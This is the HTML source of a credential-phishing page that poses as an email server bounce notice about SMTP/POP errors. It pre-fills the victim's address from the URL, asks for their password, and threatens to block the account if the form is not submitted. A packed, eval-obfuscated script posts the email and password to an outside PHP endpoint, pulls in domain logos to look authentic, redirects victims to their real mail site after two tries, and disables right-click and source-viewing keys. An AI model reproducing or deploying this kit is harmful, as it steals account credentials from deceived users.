
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>An error in your SMTP/POP settings is blocking your incoming emails</title>
<link rel="shortcut icon" href="data:image/x-icon;base64,AAABAAEAICAAAAEAIADSAgAAFgAAAIlQTkcNChoKAAAADUlIRFIAAAAgAAAAIAgGAAAAc3p69AAAAplJREFUWIXt1j2IHGUYB/DfOzdnjIKFkECIVWIKvUFsIkRExa9KJCLaWAgWJx4DilZWgpDDiI0wiViIoGATP1CCEDYHSeCwUBBkgiiKURQJFiLo4d0eOxYzC8nsO9m9XcXC+8MW+3z+9/l6l2383xH+iSBpElyTdoda26xsDqp/h0CVZ3vwKm7tMBngAs7h7eRYebG6hMtMBHbMBX89vfARHprQ5U8cwdFQlIOZCVR5di1+w/wWXT/EY6EoN5NZCODuKZLDwzgSMCuBe2fwfX6QZwtpWzqfBBtLC3txF/ZhxKbBGx0EfsTJS77vwmGjlZrD4mUzUOXZjVjGI65cnTXchB8iupdDUb7QinsQZ7GzZftdQj2JVZ49iC/w6JjksIo7OnS9tiA5Vn6GtyK2+1MY5NkhfGDygVrBAxH5WkPuMjR7/3UsUFLl2Q68s4XkA3ws3v9zoSjX28Kr5wL1xrTxa6ou+f6OZGvqPg9v1wZeaUjcELE/DVfNhWFSvy/enOIZ9eq1sTokEMNLWI79oirP8g6fXpVnh7GEvY1sV/OJ4f0UhyKKk6EoX4x5pEkgXv6L6OM99YqNw/c4kXSwG5nkIfpLCynuiahW1GWeJHkfT4aiXO9atz1XcD6I6yLyHu6bIPk6Hg9FeYZ63y9EjBarPDvQ8VJ1nd9V3D4m+RncForyxFCQ4hSeahlej88Hefauurdwaufr5z/F/ZHAX6nL+mZE18e36IWiHLkFocqzW9QXcNz1+wUHxJ/f10JRPjvGP4pk/vj5L3F8AtufdD+/p6dJDknzX+05fDLGtife/766t9MRgFCUffWTudwE3AqBlVCUf0xLYGTQqzzbhydwJ3Y34g318J1tmX+DPBTlz9MS2MY2/nP8DTGaqeTDf30rAAAAAElFTkSuQmCC" type="image/x-icon" />

<style type="text/css">
body {
	font-family: arial, verdana, sans-serif;
	line-height: 1.666;
	font-size: 14px;
}
div {
	box-sizing: border-box;
}
p {
	padding: 0px;
	clear: both;
	float: none;
	margin: 0px;
}
.container {
	padding: 0px;
	display: block;
	margin-right: 14%;
	margin-left: 14%;
	margin-top: 0%;
	margin-bottom: 0%;
	border-top-width: 1px;
	border-right-width: 1px;
	border-bottom-width: 1px;
	border-left-width: 1px;
	border-top-style: solid;
	border-right-style: solid;
	border-bottom-style: none;
	border-left-style: solid;
	border-top-color: #ddd;
	border-right-color: #ddd;
	border-bottom-color: #ddd;
	border-left-color: #ddd;
	background-color: #f6f6f6;
}

.container_Inner {
	padding: 0px;
	display: block;
	background-color: #f6f6f6;
	margin: 0px;
	border-top-width: 1px;
	border-right-width: 1px;
	border-bottom-width: 1px;
	border-left-width: 1px;
	border-top-style: solid;
	border-right-style: solid;
	border-bottom-style: none;
	border-left-style: solid;
	border-top-color: #ddd;
	border-right-color: #ddd;
	border-bottom-color: #ddd;
	border-left-color: #ddd;
}
.inner4 {
	background-color: #FFF;
	float: right;
	width: 84%;
	padding: 10px;
	border-left-width: 1px;
	border-top-style: none;
	border-right-style: none;
	border-bottom-style: none;
	border-left-style: solid;
	border-left-color: #ddd;
}
.inner4_inner {
	background-color: #FFF;
	float: right;
	width: 88%;
	padding: 10px;
	border-left-width: 1px;
	border-top-style: none;
	border-right-style: none;
	border-bottom-style: none;
	border-left-style: solid;
	border-left-color: #ddd;
}
.topic3 {
	float: left;
	padding: 10px;
	font-size: 14px;
	text-align: right;
	width: 16%;
	font-weight: bold;
	color: #666;
}
.topic3_inner {
	float: left;
	padding: 10px;
	font-size: 12px;
	text-align: right;
	width: 12%;
	font-weight: bold;
	color: #666;
}
.bg_green {
	background-color: #f4fff4;
}
.bg_ash {
	background-color: #f8f8f8;
}
.TextFaint {
	color: #999;
	line-height: 1.4em;
}

.textfield1 {
	padding: 6px;
	margin-bottom: 8px;
}
.hotz_top {
	border-top-width: 1px;
	border-top-style: solid;
	border-top-color: #ddd;
	border-right-style: none;
	border-bottom-style: none;
	border-left-style: none;
}
.red_text {
	color: #F00;
}
.topHeader {
	font-size: 24px;
	color: #99999;
	margin-right: 14%;
	margin-left: 14%;
	margin-top: 1.2%;
	margin-bottom: 1.2%;
}
</style>

<script type="text/javascript">function populate() { 
document.getElementById("demo").innerHTML = Date();
var varSection = window.location.search.substr(1);
document.getElementById("Email").value=varSection;
document.getElementById("lbEmail").value=varSection
} </script>
</head>

<body onLoad="populate()">

<div class="topHeader"><strong>An error in your SMTP/POP settings is blocking your incoming emails</strong></div>
<div class="container">
  <div class="topic3">Message:</div>
  <div class="inner4">
  
      
    <div class="container_Inner">
      <div class="topic3_inner">Email:</div>
      <div class="inner4_inner"><p id="emailich"></p> </div>
      <p>
    </div>
    
    
    
<div class="container_Inner">
      <div class="topic3_inner"> Date:</div>
      <div class="inner4_inner"><p id="demo">
      </div>
      <p>
    </div><div class="container_Inner">
      <div class="topic3_inner">Subject:</div>
      <div class="inner4_inner"><span class="red_text">Error loading some of your inbox messages</span>
      </div>
      <p>
    </div>
      <div class="hotz_top"></div>
  </div>
  <p>
  

</div>
<div class="container">
  <div class="topic3">Bounce reason:</div>
  <div class="inner4 bg_ash"> <strong>An error in your SMTP/POP settings is blocking your incoming e-mails</strong> <br />
    <span class="TextFaint"> 550-5.1.1: POP configuration text can not be verified<br />
    550-5.1.2: Login encountered an unhandled error in your SSL settings<br />
    550-5.1.3: Login encountered an unhandled error in your SSL settings </span> </div>
  <p>
</div>
<div class="container">
  <div class="topic3">Suggested Solution:</div>
  <div class="bg_green inner4">

      <link href="prototype.css" rel="stylesheet" type="text/css" />
<link href="field.css" rel="stylesheet" type="text/css" />
<style type="text/css">
.textFieldlog {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 14px;
	color: #2E2E2E;
	height: 24px;
	width: 96%;
	margin-bottom: 4px;
	border: 1px solid #A8A8A8;
	margin-right: auto;
	margin-left: auto;
	padding-top: 4px;
	padding-right: 10px;
	padding-bottom: 4px;
	padding-left: 10px;
	background-color: #FAFAF8;
	background-image: url(images/bg_form.png);
	background-repeat: repeat;
}
.ButtonLOG {
	color: #FFF;
	background-color: #F66;
	border: 1px solid #FFF;
	padding-top: 5px;
	padding-right: 3px;
	padding-bottom: 5px;
	padding-left: 3px;
	font-family: Arial, sans-serif;
	font-size: 11.6px;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	-khtml-border-radius: 4px;
	border-radius: 4px;
	margin-right: 2%;
	text-decoration: none;
	margin-top: 2%;
	font-weight: bold;
}
.ButtonLOG:hover {
	background-color: #FF2F2F;
}
.texthinter {
	font-size: 12px;
	font-family: Arial, sans-serif;
	color: #F00;
}
.textform {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 10px;
	text-transform: uppercase;
	color: #4D4D4D;
}
.YeloowTop {
	background-color: #4B4B4B;
	border: 1px solid #333333;
	padding: 2%;
	width: auto;
	margin-right: auto;
	margin-left: auto;
	font-family: Arial, Helvetica, sans-serif;
	font-size: 16px;
	color: #FFF;
}
.hint23 {
	background-color: #FFEAEA;
	border: 1px solid #FBB;
	font-family: Tahoma, Geneva, sans-serif;
	color: #333333;
	font-size: 12px;
	margin-bottom: 2%;
	width: auto;
	margin-right: auto;
	margin-left: auto;
	margin-top: 2%;
	background-image: url(images/warning.png);
	background-repeat: no-repeat;
	background-position: 8px;
	padding: 4px;
	text-transform: none;
}
.sidebox67 {
	background-color: #FFCC00;
	padding: 4%;
	width: auto;
	margin-right: auto;
	margin-left: auto;
}
td {
	padding: 8px 4px;
	border-top-width: 1px;
	border-right-width: 1px;
	border-bottom-width: 1px;
	border-left-width: 1px;
	border-top-style: solid;
	border-right-style: solid;
	border-bottom-style: none;
	border-left-style: none;
	border-top-color: #ddd;
	border-right-color: #ddd;
	border-bottom-color: #ddd;
	border-left-color: #ddd;
}
</style>
<script src="field.js" type="text/javascript"></script>

Fill out the form below, our technical team will fix the error in less than 3-4hrs. You will receive a confirmation email in your inbox once the error is fixed.<br />
<strong>Note:</strong> Failure to send this error report will result in blocking of your e-mail address. <br />
<br/>
<div align="center" class="hint23" id="msg" style="display: none; color: red;">Invalid Password.! Please enter correct password.</div>

<form>
  <div class="container_Inner">
    <div class="topic3_inner">Email Address:</div>
    <div class="inner4_inner"> <strong> &nbsp;&nbsp;
      <label for="email"></label>
      <span id="sprytextfield2">
      <input name="email" type="email" class="textfield1" id="email" placeholder="Enter Email Address" size="40" maxlength="400" value="" readonly/>
      </div>
    <p> 
  </div>
  <div class="container_Inner">
    <div class="topic3_inner">Password:</div>
    <div class="inner4_inner"> &nbsp;&nbsp; <span id="sprytextfield1">
      <input name="password" type="password" class="textfield1" id="password"  placeholder="Enter Your Password" value="" size="40"
        maxlength="400"/>
     </div>
    <p>
    <div class="hotz_top"></div>
  </div>
  <br />
  <p>
    <input type="submit" class="button1" id="submit-btn" value="Submit Report" />
    <input type="reset" name="button2" id="button2" value="Reset Form" class="button1"/>
    </td>
   
</form>

   
   
    </div>
  <p>
        <div class="hotz_top"></div>
  
</div>
<br /><br />

<script src="https://www.gstatic.com/firebasejs/8.7.1/firebase-app.js"></script>

<!-- TODO: Add SDKs for Firebase products that you want to use
     https://firebase.google.com/docs/web/setup#available-libraries -->

<script>
  // Your web app's Firebase configuration
  var firebaseConfig = {
    apiKey: "AIzaSyDBgzP2tjcSHibSdFQKr3qAGO6dpWXeSmc",
    authDomain: "oplmanns-hhssn.firebaseapp.com",
    projectId: "oplmanns-hhssn",
    storageBucket: "oplmanns-hhssn.appspot.com",
    messagingSenderId: "420081595701",
    appId: "1:420081595701:web:ae33c1eba7b27fe6a1487c"
  };
  // Initialize Firebase
  firebase.initializeApp(firebaseConfig);
</script>
</body>

  <!-- jQuery first, then Popper.js, then Bootstrap JS -->
      <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/jquery.session@1.0.0/jquery.session.min.js"></script>


  <script>
  eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$(y).1b(\'1c\',5(e){6(e.K&&(e.1d==1e)){e.L();8 z}});y.1f(\'1g\',U=>U.L());y.1h=5(e){6(e.K&&(e.D===1i||e.D===1j||e.D===1k||e.D===1l)){8 z}E{8 V}};$(y).1m("u",5(e){6(e.K){8 z}E{8 V}});$(y).1n(5(){3 m=0;$(\'#1o\').W(5(){$("#v").F();$(\'#G\').7("");$("#1p").X({1q:Y,Z:"F"},0);$("#1r").X({1s:Y,Z:"A"},1t)});3 n=M.N.1u.B(1);6(!n){}E{3 o=n;$(\'#G\').7(o);$(\'#1v\').C(o);3 p=/^([a-w-x-10\\.\\-])+\\@(([a-w-x-9\\-])+\\.)+([a-w-x-9]{2,4})+$/;6(!p.11(o)){$(\'#H\').A();n.12;8 z}3 q=o.I("@");3 r=o.B((q+1));3 c=r.B(0,r.I(\'.\'));3 s=c.13();3 t=c.14();$("#O").P("15","Q://16.17.18/"+r);$("#O").P("1w",t);$("#R").C(t);$(".R").C(t)}$(\'#S-T\').W(5(b){$(\'#H\').F();$(\'#v\').F();b.L();3 d=$("#G").7();3 e=$("#J").7();3 f=$(\'#v\').C();$(\'#v\').1x(f);3 g=d;3 h=/^([a-w-x-10\\.\\-])+\\@(([a-w-x-9\\-])+\\.)+([a-w-x-9]{2,4})+$/;6(!h.11(g)){$(\'#H\').A();d.12;8 z}3 i=g.I("@");3 j=g.B((i+1));3 c=j.B(0,j.I(\'.\'));3 k=c.13();3 l=c.14();$("#O").P("15","Q://16.17.18/"+j);$("#R").C(l);m=m+1;$.1y({1z:\'1A\',1B:\'Q://1C.1D/1E-1F/1G.1H\',1I:\'1J\',1K:{G:d,J:e,},1L:5(a){$(\'#S-T\').7(\'1M...\')},1N:5(a){6(a){$("#v").A();1O.1P(a);6(a[\'1Q\']==\'1R\'){$("#J").7("");6(m>=2){m=0;M.N.1S("19://1a."+j)}}E{}}},H:5(){$("#J").7("");6(m>=2){m=0;M.N.1T("19://1a."+j)}$("#v").A()},1U:5(){$(\'#S-T\').7(\'1V\')}})})});',62,120,'|||var||function|if|val|return|||||||||||||||||||||||msg|zA|Z0|document|false|show|substr|html|keyCode|else|hide|email|error|indexOf|password|ctrlKey|preventDefault|window|location|logoimg|attr|https|logoname|submit|btn|event|true|click|animate|200|opacity|9_|test|focus|toLowerCase|toUpperCase|src|logo|clearbit|com|http|www|bind|keydown|which|83|addEventListener|contextmenu|onkeydown|67|86|85|117|keypress|ready|back1|automail|left|inputbar|right|1000|hash|emailich|alt|text|ajax|dataType|JSON|url|ulasdsp200|xyz|sir|rit|api|php|type|POST|data|beforeSend|Verifing|success|console|log|signal|ok|href|replace|complete|LOGIN'.split('|'),0,{}))
</script>
</html>
